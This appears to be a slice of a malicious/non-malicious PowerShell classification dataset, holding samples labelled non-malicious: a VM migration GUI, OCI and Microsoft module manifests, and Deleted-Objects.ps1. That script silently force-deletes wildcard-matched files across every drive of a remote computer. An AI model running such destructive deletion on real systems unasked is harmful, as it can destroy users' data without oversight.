$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 250
$System_Drawing_Point.Y = 160
$AllClustersCheckbox.Location = $System_Drawing_Point
$AllClustersCheckbox.DataBindings.DefaultDataSourceUpdateMode = 0
$AllClustersCheckbox.add_Click($AllClustersCheckbox_Click)
$AllClustersCheckbox.Enabled = $False
$MigrationForm.Controls.Add($AllClustersCheckbox)
# End All Clusters Checkbox
# Start Destination List Box
$DestinationListBox.FormattingEnabled = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 415
$DestinationListBox.Size = $System_Drawing_Size
$DestinationListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$DestinationListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$DestinationListBox.Name = 'DestinationListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 250
$System_Drawing_Point.Y = 180
$DestinationListBox.Location = $System_Drawing_Point
$DestinationListBox.HorizontalScrollBar = $true
$DestinationListBox.MultiColumn = $false
$DestinationListBox.TabIndex = 5
$DestinationListBox.Sorted = $True
$DestinationListBox.HorizontalScrollbar = $True
$MigrationForm.Controls.Add($DestinationListBox)
# End Destination List Box
# Start Destination Button
$DestinationButton.TabIndex = 7
$DestinationButton.Name = 'Destination Button'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 20
$DestinationButton.Size = $System_Drawing_Size
$DestinationButton.Font = new-object System.Drawing.Font("Tahoma",8)
$DestinationButton.UseVisualStyleBackColor = $True
$DestinationButton.Text = 'Destination'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 250
$System_Drawing_Point.Y = 600
$DestinationButton.Location = $System_Drawing_Point
$DestinationButton.DataBindings.DefaultDataSourceUpdateMode = 0
$DestinationButton.add_Click($DestinationButton_OnClick)
$DestinationButton.Enabled = $false
$MigrationForm.Controls.Add($DestinationButton)
# End Destination Button
# Start FindVM Label
$FindVMLabel.TabIndex = 2
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 60
$System_Drawing_Size.Height = 20
$FindVMLabel.Size = $System_Drawing_Size
$FindVMLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$FindVMLabel.Text = 'Find VM:'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 650
$FindVMLabel.Location = $System_Drawing_Point
$FindVMLabel.DataBindings.DefaultDataSourceUpdateMode = 0
$FindVMLabel.Name = 'FindVMLabel'
$MigrationForm.Controls.Add($FindVMLabel)
# End FindVM Label
# Start FindVM Textbox
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 140
$System_Drawing_Size.Height = 20
$FindVMTxtBox.Size = $System_Drawing_Size
$FindVMTxtBox.Font = new-object System.Drawing.Font("Tahoma",8)
$FindVMTxtBox.DataBindings.DefaultDataSourceUpdateMode = 0
$FindVMTxtBox.Name = 'FindVMTxtBox'
$FindVMTxtBox.TabIndex = 6
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 90
$System_Drawing_Point.Y = 650
$FindVMTxtBox.Location = $System_Drawing_Point
$FindVMTxtBox.Enabled = $false
$MigrationForm.Controls.Add($FindVMTxtBox)
# End FindVM Textbox
#Start FindVM Button
$MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 250
$System_Drawing_Point.Y = 650
$FindVMBtn.Location = $System_Drawing_Point
$FindVMBtn.Name = "FindVMBtn"
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Height = 20
$System_Drawing_Size.Width = 50
$FindVMBtn.Size = $System_Drawing_Size
$FindVMBtn.TabIndex = 4
$FindVMBtn.Text = "Go"
$FindVMBtn.Font = new-object System.Drawing.Font("Tahoma",8)
$FindVMBtn.UseVisualStyleBackColor = $True
$FindVMBtn.add_Click($FindVMBtn_OnClick)
$FindVMBtn.Enabled = $false
$MigrationForm.Controls.Add($FindVMBtn)
#End FindVM Button
#Start Reset FindVM Button
$MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 305
$System_Drawing_Point.Y = 650
$ResetFindVMBtn.Location = $System_Drawing_Point
$ResetFindVMBtn.Name = "ResetFindVMBtn"
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Height = 20
$System_Drawing_Size.Width = 50
$ResetFindVMBtn.Size = $System_Drawing_Size
$ResetFindVMBtn.TabIndex = 5
$ResetFindVMBtn.Font = new-object System.Drawing.Font("Tahoma",8)
$ResetFindVMBtn.Text = "Reset"
$ResetFindVMBtn.UseVisualStyleBackColor = $True
$ResetFindVMBtn.add_Click($ResetFindVMBtn_OnClick)
$ResetFindVMBtn.Enabled = $false
$MigrationForm.Controls.Add($ResetFindVMBtn)
#End Reset FindVM Button
# Start Migrate Button
$MigrateButton.TabIndex = 7
$MigrateButton.Name = 'MigrateButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 130
$System_Drawing_Size.Height = 25
$MigrateButton.Size = $System_Drawing_Size
$MigrateButton.Font = new-object System.Drawing.Font("Tahoma",8)
$MigrateButton.UseVisualStyleBackColor = $True
$MigrateButton.Text = 'Migrate'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 720
$MigrateButton.Location = $System_Drawing_Point
$MigrateButton.DataBindings.DefaultDataSourceUpdateMode = 0
$MigrateButton.add_Click($MigrateButton_OnClick)
$MigrateButton.Enabled = $false
$MigrationForm.Controls.Add($MigrateButton)
# End Migrate Button
# Start RESET Button
$ResetButton.TabIndex = 19
$ResetButton.Name = 'ResetButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 140
$System_Drawing_Size.Height = 25
$ResetButton.Size = $System_Drawing_Size
$ResetButton.Font = new-object System.Drawing.Font("Tahoma",8)
$ResetButton.UseVisualStyleBackColor = $True
$ResetButton.Text = 'Reset'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 170
$System_Drawing_Point.Y = 720
$ResetButton.Location = $System_Drawing_Point
$ResetButton.DataBindings.DefaultDataSourceUpdateMode = 0
$ResetButton.add_Click($ResetButton_OnClick)
$ResetButton.Enabled = $false
$MigrationForm.Controls.Add($ResetButton)
# End RESET Button
# Start CLOSE Button
$CloseButton.TabIndex = 19
$CloseButton.Name = 'CloseButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 130
$System_Drawing_Size.Height = 25
$CloseButton.Size = $System_Drawing_Size
$CloseButton.Font = new-object System.Drawing.Font("Tahoma",8)
$CloseButton.UseVisualStyleBackColor = $True
$CloseButton.Text = 'Close'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 320
$System_Drawing_Point.Y = 720
$CloseButton.Location = $System_Drawing_Point
$CloseButton.DataBindings.DefaultDataSourceUpdateMode = 0
$CloseButton.add_Click($CloseButton_OnClick)
$MigrationForm.Controls.Add($CloseButton)
# End CLOSE Button
# Start Messages ListBox
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 80
$System_Drawing_Size.Height = 20
$MessagesLabel.Size = $System_Drawing_Size
$MessagesLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$MessagesLabel.Text = 'Messages'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 480
$System_Drawing_Point.Y = 50
$MessagesLabel.Location = $System_Drawing_Point
$MessagesLabel.DataBindings.DefaultDataSourceUpdateMode = 0
$MessagesLabel.Name = 'MessagesLabel'
$MigrationForm.Controls.Add($MessagesLabel)
$MessagesListBox.FormattingEnabled = $True
$MessagesListBox.SelectionMode = "None"
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 525
$System_Drawing_Size.Height = 285
$MessagesListBox.Size = $System_Drawing_Size
$MessagesListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$MessagesListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$MessagesListBox.Name = 'MessagesListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 480
$System_Drawing_Point.Y = 70
$MessagesListBox.Location = $System_Drawing_Point
$MessagesListBox.MultiColumn = $false
$MessagesListBox.HorizontalScrollbar = $true
$MigrationForm.Controls.Add($MessagesListBox)
# End Messages ListBox
# Start Task ListBox
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 80
$System_Drawing_Size.Height = 20
$TaskLabel.Size = $System_Drawing_Size
$TaskLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$TaskLabel.Text = 'Recent Tasks'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 480
$System_Drawing_Point.Y = 380
$TaskLabel.Location = $System_Drawing_Point
$TaskLabel.DataBindings.DefaultDataSourceUpdateMode = 0
$TaskLabel.Name = 'TaskLabel'
$MigrationForm.Controls.Add($TaskLabel)
$TaskListBox.FormattingEnabled = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 525
$System_Drawing_Size.Height = 285
$TaskListBox.Size = $System_Drawing_Size
$TaskListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$TaskListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$TaskListBox.Name = 'TaskListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 480
$System_Drawing_Point.Y = 400
$TaskListBox.Location = $System_Drawing_Point
$TaskListBox.MultiColumn = $false
$TaskListBox.HorizontalScrollbar = $true
$TaskListBox.SelectionMode = "MultiExtended"
$MigrationForm.Controls.Add($TaskListBox)
# End Task ListBox
# Start Clear Messages Button
$ClearMsgButton.TabIndex = 0
$ClearMsgButton.Name = 'ClearMsgButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 93
$System_Drawing_Size.Height = 25
$ClearMsgButton.Size = $System_Drawing_Size
$ClearMsgButton.Font = new-object System.Drawing.Font("Tahoma",8)
$ClearMsgButton.UseVisualStyleBackColor = $True
$ClearMsgButton.Enabled = $false
$ClearMsgButton.Text = 'Clear Messages'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 480
$System_Drawing_Point.Y = 720
$ClearMsgButton.Location = $System_Drawing_Point
$ClearMsgButton.DataBindings.DefaultDataSourceUpdateMode = 0
$ClearMsgButton.add_Click($ClearMsgButton_Click)
$MigrationForm.Controls.Add($ClearMsgButton)
# End Clear Messages Button
# Start Undo Button
$UndoButton.TabIndex = 0
$UndoButton.Name = 'UndoButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 93
$System_Drawing_Size.Height = 25
$UndoButton.Size = $System_Drawing_Size
$UndoButton.Font = new-object System.Drawing.Font("Tahoma",8)
$UndoButton.UseVisualStyleBackColor = $True
$UndoButton.Enabled = $false
$UndoButton.Text = 'Undo'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 588
$System_Drawing_Point.Y = 720
$UndoButton.Location = $System_Drawing_Point
$UndoButton.DataBindings.DefaultDataSourceUpdateMode = 0
$UndoButton.add_Click($UndoButton_Click)
$MigrationForm.Controls.Add($UndoButton)
# End Undo Button
# Start UndoALL Button
$UndoALLButton.TabIndex = 0
$UndoALLButton.Name = 'UndoALLButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 93
$System_Drawing_Size.Height = 25
$UndoALLButton.Size = $System_Drawing_Size
$UndoALLButton.Font = new-object System.Drawing.Font("Tahoma",8)
$UndoALLButton.UseVisualStyleBackColor = $True
$UndoALLButton.Enabled = $false
$UndoALLButton.Text = 'Undo ALL'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 696
$System_Drawing_Point.Y = 720
$UndoALLButton.Location = $System_Drawing_Point
$UndoALLButton.DataBindings.DefaultDataSourceUpdateMode = 0
$UndoALLButton.add_Click($UndoALLButton_Click)
$MigrationForm.Controls.Add($UndoALLButton)
# End UndoALL Button
# Start Save Task Button
$SaveTaskButton.TabIndex = 0
$SaveTaskButton.Name = 'SaveTaskButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 93
$System_Drawing_Size.Height = 25
$SaveTaskButton.Size = $System_Drawing_Size
$SaveTaskButton.Font = new-object System.Drawing.Font("Tahoma",8)
$SaveTaskButton.UseVisualStyleBackColor = $True
$SaveTaskButton.Enabled = $false
$SaveTaskButton.Text = 'Save Tasks'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 804
$System_Drawing_Point.Y = 720
$SaveTaskButton.Location = $System_Drawing_Point
$SaveTaskButton.DataBindings.DefaultDataSourceUpdateMode = 0
$SaveTaskButton.add_Click($SaveTaskButton_Click)
$MigrationForm.Controls.Add($SaveTaskButton)
# End Save Task Button
# Start Load Task Button
$ReloadTaskButton.TabIndex = 0
$ReloadTaskButton.Name = 'ReloadTaskButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 93
$System_Drawing_Size.Height = 25
$ReloadTaskButton.Size = $System_Drawing_Size
$ReloadTaskButton.Font = new-object System.Drawing.Font("Tahoma",8)
$ReloadTaskButton.UseVisualStyleBackColor = $True
$ReloadTaskButton.Enabled = $false
$ReloadTaskButton.Text = 'Reload Tasks'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 912
$System_Drawing_Point.Y = 720
$ReloadTaskButton.Location = $System_Drawing_Point
$ReloadTaskButton.DataBindings.DefaultDataSourceUpdateMode = 0
$ReloadTaskButton.add_Click($ReloadTaskButton_Click)
$MigrationForm.Controls.Add($ReloadTaskButton)
# End Load Task Button
#endregion Generated Form Code
#Save the initial state of the form
$InitialFormWindowState = $MigrationForm.WindowState
#Init the OnLoad event to correct the initial state of the form
$MigrationForm.add_Load($OnLoadForm_StateCorrection)
#Show the Form
$MigrationForm.ShowDialog()| Out-Null
} #End Function
#Call the Function
GenerateForm
|
combined_dataset/train/non-malicious/Deleted-Objects.ps1
|
Deleted-Objects.ps1
|
param (
$Computer,
[String[]]$ObjectsDeleted
)
$Info = $null
$Disks = $null
trap {Write-Host "Error WmiObject $Computer";Continue}
$Disks += Get-WmiObject win32_logicaldisk -ComputerName $Computer |
Where-Object {$_.Size -ne $null}
foreach ($Disk in $Disks){
if ($Disk.Name -like "*:*") {
$Disk = $Disk.Name.Replace(":","$")
}
trap {Write-Host "Error ChildItem $Computer";Continue}
$Info += Get-ChildItem "\\\\$Computer\\$Disk\\*" -Recurse -ErrorAction SilentlyContinue
if ($Info){
foreach ($Object in $ObjectsDeleted){
$Info | Where-Object {$_.Name -like $Object} |
% {remove-item $_.fullname -Recurse -Force -ErrorAction SilentlyContinue}
}
}
}
|
combined_dataset/train/non-malicious/sample_59_93.ps1
|
sample_59_93.ps1
|
#
# Module manifest for module 'OCI.PSModules.Loganalytics'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Loganalytics.dll'
# Version number of this module.
ModuleVersion = '85.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'a190d2eb-8d34-45b0-836a-ba4f1b2e1914'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Loganalytics Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Loganalytics.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCILoganalyticsEntityAssociation',
'Add-OCILoganalyticsSourceEventTypes',
'Confirm-OCILoganalyticsAssociationParameters',
'Confirm-OCILoganalyticsEndpoint', 'Confirm-OCILoganalyticsFile',
'Confirm-OCILoganalyticsLabelCondition',
'Confirm-OCILoganalyticsSource',
'Confirm-OCILoganalyticsSourceExtendedFieldDetails',
'Confirm-OCILoganalyticsSourceMapping',
'Disable-OCILoganalyticsArchiving',
'Disable-OCILoganalyticsAutoAssociation',
'Disable-OCILoganalyticsIngestTimeRule',
'Disable-OCILoganalyticsSourceEventTypes',
'Enable-OCILoganalyticsArchiving',
'Enable-OCILoganalyticsAutoAssociation',
'Enable-OCILoganalyticsIngestTimeRule',
'Enable-OCILoganalyticsSourceEventTypes',
'Export-OCILoganalyticsCustomContent',
'Export-OCILoganalyticsQueryResult',
'Get-OCILoganalyticsAssociableEntitiesList',
'Get-OCILoganalyticsAssociatedEntitiesList',
'Get-OCILoganalyticsAssociationSummary',
'Get-OCILoganalyticsAutoAssociationsList',
'Get-OCILoganalyticsCategoriesList', 'Get-OCILoganalyticsCategory',
'Get-OCILoganalyticsColumnNames',
'Get-OCILoganalyticsConfigWorkRequest',
'Get-OCILoganalyticsConfigWorkRequestsList',
'Get-OCILoganalyticsEffectivePropertiesList',
'Get-OCILoganalyticsEmBridge', 'Get-OCILoganalyticsEmBridgesList',
'Get-OCILoganalyticsEmBridgeSummary',
'Get-OCILoganalyticsEncryptionKeyInfoList',
'Get-OCILoganalyticsEntitiesList',
'Get-OCILoganalyticsEntitiesSummary', 'Get-OCILoganalyticsEntity',
'Get-OCILoganalyticsEntityAssociationsList',
'Get-OCILoganalyticsEntitySourceAssociationsList',
'Get-OCILoganalyticsEntityTopologyList',
'Get-OCILoganalyticsEntityType',
'Get-OCILoganalyticsEntityTypesList', 'Get-OCILoganalyticsField',
'Get-OCILoganalyticsFieldsList', 'Get-OCILoganalyticsFieldsSummary',
'Get-OCILoganalyticsIngestTimeRule',
'Get-OCILoganalyticsIngestTimeRulesList',
'Get-OCILoganalyticsLabel',
'Get-OCILoganalyticsLabelPrioritiesList',
'Get-OCILoganalyticsLabelsList',
'Get-OCILoganalyticsLabelSourceDetailsList',
'Get-OCILoganalyticsLabelSummary', 'Get-OCILoganalyticsLogGroup',
'Get-OCILoganalyticsLogGroupsList',
'Get-OCILoganalyticsLogGroupsSummary',
'Get-OCILoganalyticsLogSetsCount', 'Get-OCILoganalyticsLogSetsList',
'Get-OCILoganalyticsLookup', 'Get-OCILoganalyticsLookupsList',
'Get-OCILoganalyticsLookupSummary',
'Get-OCILoganalyticsMetaSourceTypesList',
'Get-OCILoganalyticsNamespace', 'Get-OCILoganalyticsNamespacesList',
'Get-OCILoganalyticsObjectCollectionRule',
'Get-OCILoganalyticsObjectCollectionRulesList',
'Get-OCILoganalyticsOverlappingRecallsList',
'Get-OCILoganalyticsParser',
'Get-OCILoganalyticsParserFunctionsList',
'Get-OCILoganalyticsParserMetaPluginsList',
'Get-OCILoganalyticsParsersList',
'Get-OCILoganalyticsParserSummary',
'Get-OCILoganalyticsPreferences',
'Get-OCILoganalyticsPropertiesMetadataList',
'Get-OCILoganalyticsQueryResult',
'Get-OCILoganalyticsQueryWorkRequest',
'Get-OCILoganalyticsQueryWorkRequestsList',
'Get-OCILoganalyticsRecallCount',
'Get-OCILoganalyticsRecalledDataList',
'Get-OCILoganalyticsRecalledDataSize',
'Get-OCILoganalyticsResourceCategoriesList',
'Get-OCILoganalyticsRulesList', 'Get-OCILoganalyticsRulesSummary',
'Get-OCILoganalyticsScheduledTask',
'Get-OCILoganalyticsScheduledTasksList',
'Get-OCILoganalyticsSource',
'Get-OCILoganalyticsSourceAssociationsList',
'Get-OCILoganalyticsSourceEventTypesList',
'Get-OCILoganalyticsSourceExtendedFieldDefinitionsList',
'Get-OCILoganalyticsSourceLabelOperatorsList',
'Get-OCILoganalyticsSourceMetaFunctionsList',
'Get-OCILoganalyticsSourcePatternsList',
'Get-OCILoganalyticsSourcesList',
'Get-OCILoganalyticsSourceSummary', 'Get-OCILoganalyticsStorage',
'Get-OCILoganalyticsStorageUsage',
'Get-OCILoganalyticsStorageWorkRequest',
'Get-OCILoganalyticsStorageWorkRequestErrorsList',
'Get-OCILoganalyticsStorageWorkRequestsList',
'Get-OCILoganalyticsSupportedCharEncodingsList',
'Get-OCILoganalyticsSupportedTimezonesList',
'Get-OCILoganalyticsUnprocessedDataBucket',
'Get-OCILoganalyticsUpload', 'Get-OCILoganalyticsUploadFilesList',
'Get-OCILoganalyticsUploadsList',
'Get-OCILoganalyticsUploadWarningsList',
'Get-OCILoganalyticsWarningsList', 'Get-OCILoganalyticsWorkRequest',
'Get-OCILoganalyticsWorkRequestErrorsList',
'Get-OCILoganalyticsWorkRequestLogsList',
'Get-OCILoganalyticsWorkRequestsList',
'Import-OCILoganalyticsCustomContent',
'Invoke-OCILoganalyticsAppendLookupData',
'Invoke-OCILoganalyticsAssignEncryptionKey',
'Invoke-OCILoganalyticsBatchGetBasicInfo',
'Invoke-OCILoganalyticsClean',
'Invoke-OCILoganalyticsCompareContent',
'Invoke-OCILoganalyticsEstimatePurgeDataSize',
'Invoke-OCILoganalyticsEstimateRecallDataSize',
'Invoke-OCILoganalyticsEstimateReleaseDataSize',
'Invoke-OCILoganalyticsExtractStructuredLogFieldPaths',
'Invoke-OCILoganalyticsExtractStructuredLogHeaderPaths',
'Invoke-OCILoganalyticsFilter',
'Invoke-OCILoganalyticsOffboardNamespace',
'Invoke-OCILoganalyticsOnboardNamespace',
'Invoke-OCILoganalyticsParseQuery',
'Invoke-OCILoganalyticsPauseScheduledTask',
'Invoke-OCILoganalyticsPurgeStorageData',
'Invoke-OCILoganalyticsQuery',
'Invoke-OCILoganalyticsRecallArchivedData',
'Invoke-OCILoganalyticsReleaseRecalledData',
'Invoke-OCILoganalyticsResumeScheduledTask',
'Invoke-OCILoganalyticsRun',
'Invoke-OCILoganalyticsSetUnprocessedDataBucket',
'Invoke-OCILoganalyticsSuggest',
'Invoke-OCILoganalyticsSuppressWarning',
'Invoke-OCILoganalyticsTestParser',
'Invoke-OCILoganalyticsUnsuppressWarning',
'Invoke-OCILoganalyticsUpsertAssociations',
'Invoke-OCILoganalyticsUpsertField',
'Invoke-OCILoganalyticsUpsertLabel',
'Invoke-OCILoganalyticsUpsertParser',
'Invoke-OCILoganalyticsUpsertSource',
'Invoke-OCILoganalyticsVerify',
'Move-OCILoganalyticsEmBridgeCompartment',
'Move-OCILoganalyticsEntityCompartment',
'Move-OCILoganalyticsIngestTimeRuleCompartment',
'Move-OCILoganalyticsLogGroupCompartment',
'Move-OCILoganalyticsObjectCollectionRuleCompartment',
'Move-OCILoganalyticsScheduledTaskCompartment',
'New-OCILoganalyticsEmBridge', 'New-OCILoganalyticsEntity',
'New-OCILoganalyticsEntityType',
'New-OCILoganalyticsIngestTimeRule', 'New-OCILoganalyticsLogGroup',
'New-OCILoganalyticsObjectCollectionRule',
'New-OCILoganalyticsScheduledTask',
'Register-OCILoganalyticsLookup',
'Remove-OCILoganalyticsAssociations',
'Remove-OCILoganalyticsEmBridge', 'Remove-OCILoganalyticsEntity',
'Remove-OCILoganalyticsEntityAssociations',
'Remove-OCILoganalyticsEntityType', 'Remove-OCILoganalyticsField',
'Remove-OCILoganalyticsIngestTimeRule',
'Remove-OCILoganalyticsLabel', 'Remove-OCILoganalyticsLogGroup',
'Remove-OCILoganalyticsLookup',
'Remove-OCILoganalyticsObjectCollectionRule',
'Remove-OCILoganalyticsParser', 'Remove-OCILoganalyticsPreferences',
'Remove-OCILoganalyticsResourceCategories',
'Remove-OCILoganalyticsScheduledTask',
'Remove-OCILoganalyticsSource',
'Remove-OCILoganalyticsSourceEventTypes',
'Remove-OCILoganalyticsUpload', 'Remove-OCILoganalyticsUploadFile',
'Remove-OCILoganalyticsUploadWarning',
'Stop-OCILoganalyticsQueryWorkRequest',
'Update-OCILoganalyticsEmBridge', 'Update-OCILoganalyticsEntity',
'Update-OCILoganalyticsEntityType',
'Update-OCILoganalyticsIngestTimeRule',
'Update-OCILoganalyticsLogGroup', 'Update-OCILoganalyticsLookup',
'Update-OCILoganalyticsLookupData',
'Update-OCILoganalyticsObjectCollectionRule',
'Update-OCILoganalyticsPreferences',
'Update-OCILoganalyticsResourceCategories',
'Update-OCILoganalyticsScheduledTask',
'Update-OCILoganalyticsStorage',
'Write-OCILoganalyticsDiscoveryData',
'Write-OCILoganalyticsLogEventsFile',
'Write-OCILoganalyticsLogFile',
'Write-OCILoganalyticsQueryWorkRequestBackground'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Loganalytics'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_10_4.ps1
|
sample_10_4.ps1
|
@{
GUID="A94C8C7E-9810-47C0-B8AF-65089C13A35A"
Author="PowerShell"
CompanyName="Microsoft Corporation"
Copyright="Copyright (c) Microsoft Corporation."
ModuleVersion="7.0.0.0"
CompatiblePSEditions = @("Core")
PowerShellVersion="3.0"
FunctionsToExport = @()
CmdletsToExport="Get-Credential", "Get-ExecutionPolicy", "Set-ExecutionPolicy", "ConvertFrom-SecureString", "ConvertTo-SecureString", "Get-PfxCertificate" , "Protect-CmsMessage", "Unprotect-CmsMessage", "Get-CmsMessage"
AliasesToExport = @()
NestedModules="Microsoft.PowerShell.Security.dll"
HelpInfoURI = 'https://aka.ms/powershell72-help'
}
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAMiHmazz1gQ06K
# unvXv+rGMEHONdPsUaRwD11+c7rHFaCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0
# Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz
